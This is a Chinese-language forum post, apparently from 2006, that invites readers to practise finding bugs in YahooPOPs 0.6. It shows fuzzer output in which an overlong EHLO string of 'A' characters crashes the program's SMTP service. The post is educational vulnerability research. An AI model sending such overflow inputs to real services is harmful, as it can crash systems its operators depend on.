YaHooPOPs漏洞exploit分析
来源:互联摘选 日期:2006-11-15 07:53
先前在UNIX版想用一个练习题搞点学习的气氛
大概大家手头并没有linux机器
不方便练习吧,没有什么人过问,呜呜呜
我找了一个比较典型的Windows下的软件漏洞
大家一起来讨论学习一下
先点击下面链接,看看通告
_blank>
http://www.hat-squad.com/en/000075.html然后从下面网站下载0.6版本
_blank>
http://yahoopops.sourceforge.net安装好后就可以测试了
虽然这个漏洞已经被人捷足先登发现了
其实我们自己也可以来挖掘类似软件的漏洞
Codz:
C:fuzzer>fuzzer.py localhost 25 smtp
<*>here fuzzing begins [smtp]<*>
[+] Keys del protocolo: ['comm', 'banner', 'proto']
[+] Protocol family: tcp
[+] Recv Banner: ON
[+] Commands
<< 220 YahooPOPs! Simple Mail Transfer Service Ready
>> EHLO AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA
TCP socket unexpectedly closed when receiving
<**> It was suppose to recv something, but recv nothing CHECKIT!
<**>
-----------------------------------------------
Couldn't connect TCP socket
<**> Bug found!!! ;)) <**>
你看,这不见发现漏洞了嘛^_^
